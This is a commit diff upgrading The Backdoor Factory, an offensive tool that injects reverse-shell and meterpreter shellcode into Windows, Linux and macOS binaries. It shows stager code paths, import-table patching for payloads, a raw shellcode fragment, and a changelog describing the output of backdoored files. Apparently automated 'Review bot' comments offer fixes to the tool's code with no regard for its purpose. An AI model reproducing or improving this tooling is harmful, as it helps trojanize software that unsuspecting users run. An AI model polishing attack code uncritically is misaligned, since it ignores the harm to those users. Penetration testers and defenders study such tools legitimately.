Commit e0307aee authored by Mati's avatar Mati

Imported Upstream version 2.4.1

parent b4ee9e50
......@@ -21,21 +21,32 @@ See the wiki: https://github.com/secretsquirrel/the-backdoor-factory/wiki
Dependences:
Capstone, using the 'next' repo until it is the 'master' repo:
https://github.com/aquynh/capstone/tree/next
Capstone, using the master repo at this commit:
https://github.com/aquynh/capstone/releases/tag/3.0.1
git checkout e9be7ec26c2b13ba248d8b093a9f0d333f866d2c
Pefile, most recent:
https://code.google.com/p/pefile/
INSTALL:
./install.sh
Kali Install:
apt-get update
apt-get install backdoor-factory
Other *NIX/MAC INSTALL:
./install.sh
This will install Capstone with the 'next' repo and use pip to install pefile.
This will install Capstone with 3.01 pip to install pefile.
UPDATE:
./update.sh
./update.sh
---
......@@ -71,6 +82,7 @@ From DerbyCon:
Recently tested on many binaries.
---
./backdoor.py -h
Usage: backdoor.py [options]
Options:
......@@ -164,6 +176,7 @@ Recently tested on many binaries.
-Append (a), for creating a code cave
-Ignore (i), nevermind, ignore this binary
Can ignore DLLs.
Import Table Patching
###ELF Files
......@@ -268,18 +281,18 @@ Sample Usage:
###Changelog
####12/27/2014
####2/14/2014
I <3 you guys
Added payloadtests.py
* Added Import Address Table patching for PEs to support iat_reverse_tcp payloads that
use the import table for winAPI calls. If the binary you are patching does not
have LoadLibraryA and GetProcAddress, for example, BDF will patch it in to a
new Import Table in a new section. Supports x64/x86 PEs.
This script will output patched files in backdoored that will allow for the user to
test the payloads as they wish. Each payload type increments the port used
by one.
* Added iat_reverse_tcp for x64 PEs.
```
Usage: payloadtest.py binary HOST PORT
* Bug fixes and improvements
```
####1/1/2015
Happy New Year!
......@@ -294,6 +307,18 @@ breaks BDF.
Fixes to support cython capstone implementation null byte truncation issue
####12/27/2014
Added payloadtests.py
This script will output patched files in backdoored that will allow for the user to
test the payloads as they wish. Each payload type increments the port used
by one.
Usage: payloadtest.py binary HOST PORT
####12/17/2014
OS X Beaconing Payloads for x86 and x64: beaconing_reverse_shell_tcp
......
......@@ -12,7 +12,7 @@ techniques are based on.
Special thanks to Travis Morrow for poking holes in my ideas.
Copyright (c) 2013-2014, Joshua Pitts
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
......@@ -62,7 +62,7 @@ def signal_handler(signal, frame):
class bdfMain():
version = """\
2.3.8
2.4.1
"""
author = """\
......@@ -196,7 +196,7 @@ class bdfMain():
parser.add_option("-i", "--injector", default=False, dest="INJECTOR",
action="store_true",
help="This command turns the backdoor factory in a "
"hunt and shellcode inject type of mechinism. Edit "
"hunt and shellcode inject type of mechanism. Edit "
"the target settings in the injector module.")
parser.add_option("-u", "--suffix", default=".old", dest="SUFFIX",
action="store", type="string",
......@@ -538,7 +538,7 @@ class bdfMain():
sys.exit()
result = supported_file.run_this()
if result is True and options.SUPPORT_CHECK is False:
print "File {0} is in the 'backdoored' directory".format(supported_file.FILE)
print "File {0} is in the 'backdoored' directory".format(os.path.basename(supported_file.OUTPUT))
#END BDF MAIN
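Review bot: The new print in the last hunk reports only `os.path.basename(supported_file.OUTPUT)` while the message text still hardcodes the 'backdoored' directory, so if OUTPUT ever points elsewhere the user is told a location that does not match the file actually written; printing the path itself, `print "File {0} has been written".format(supported_file.OUTPUT)`, keeps the message and the real location in agreement. This also assumes `os` is already imported in backdoor.py, which the hunk does not show. The enclosing method of bdfMain starts outside the hunk.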
......
#!/usr/bin/env python
'''
Copyright (c) 2013-2014, Joshua Pitts
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
......
......@@ -10,7 +10,7 @@ git clone https://github.com/aquynh/capstone/
cd capstone
git checkout b53a59af53ffbd5dbe8dbcefba41a00cf4fc7469
git checkout e9be7ec26c2b13ba248d8b093a9f0d333f866d2c
./make.sh
......
......@@ -198,6 +198,7 @@ class macho_intel64_shellcode():
supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = supplied_shellcode
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
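Review bot: The new `self.shellcode2 = supplied_shellcode` line stores the contents of a handle that the preceding line opens with mode 'r+b' and never closes, so the supplied shellcode file stays open read-write for the rest of the process even though only its bytes are needed; `with open(self.SUPPLIED_SHELLCODE, 'rb') as fh: supplied_shellcode = fh.read()` closes the handle and drops the write access. The method containing this hunk starts and ends outside it.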
......
'''
Copyright (c) 2013-2014, Joshua Pitts
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
......@@ -35,7 +35,6 @@ POSSIBILITY OF SUCH DAMAGE.
##########################################################
# BEGIN win32 shellcodes #
##########################################################
import sys
import struct
from intelmodules import eat_code_caves
......@@ -53,12 +52,10 @@ class winI32_shellcode():
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.stackpreserve = "\x90\x90\x60\x9c"
self.stackrestore = "\x9d\x61"
self.apis_needed = None
def pack_ip_addresses(self):
hostocts = []
if self.HOST is None:
print "This shellcode requires a HOST parameter -H"
return False
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
......@@ -73,8 +70,13 @@ class winI32_shellcode():
Reverse tcp stager. Can be used with windows/shell/reverse_tcp or
windows/meterpreter/reverse_tcp payloads from metasploit.
"""
if self.PORT is None:
print ("Must provide port")
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
flItms['stager'] = True
......@@ -335,8 +337,13 @@ class winI32_shellcode():
Traditional meterpreter reverse https shellcode from metasploit
modified to support cave jumping.
"""
if self.PORT is None:
print ("Must provide port")
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
flItms['stager'] = True
......@@ -466,9 +473,15 @@ class winI32_shellcode():
Modified metasploit windows/shell_reverse_tcp shellcode
to enable continued execution and cave jumping.
"""
if self.PORT is None:
print ("Must provide port")
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = "\xfc\xe8"
......@@ -531,16 +544,18 @@ class winI32_shellcode():
http://labs.bromium.com/2014/02/24/bypassing-emet-4-1/
via @bannedit0 (twitter handle)
"""
if self.PORT is None:
print ("Must provide port")
return False
flItms['apis_needed'] = ['LoadLibraryA', 'GetProcAddress']
for api in flItms['apis_needed']:
if api not in flItms:
return False
if 'LoadLibraryA' not in flItms:
print "[!] Binary does not have the LoadLibraryA API in IAT"
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if 'GetProcAddress' not in flItms:
print "[!] Binary does not have GetProcAddress API in IAT"
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
self.shellcode1 = "\xfc" # CLD
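Review bot: The new IAT check in the last hunk (`for api in flItms['apis_needed']: if api not in flItms: return False`) fails silently, whereas the lines it replaces printed which API was missing, so a user whose binary lacks LoadLibraryA or GetProcAddress now gets no explanation; add `print "[!] Binary does not have the {0} API in IAT".format(api)` before the `return False`. The same hunk runs the IAT loop before the PORT and HOST checks, so a missing -P or -H is only reported once the binary passes the API check; moving the two parameter checks above the loop would match the other three hunks in this file, which validate PORT and HOST first. Minor: the new HOST messages use `print "..."` while the PORT messages beside them use `print ("...")`; pick one form. That `flItms` keys are IAT entry names is inferred from the removed messages rather than shown here, and the enclosing method starts and ends outside the hunk.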
......
#!/usr/bin/env python
'''
Copyright (c) 2013-2014, Joshua Pitts
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
......
#!/usr/bin/env python
'''
Copyright (c) 2013-2014, Joshua Pitts
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
......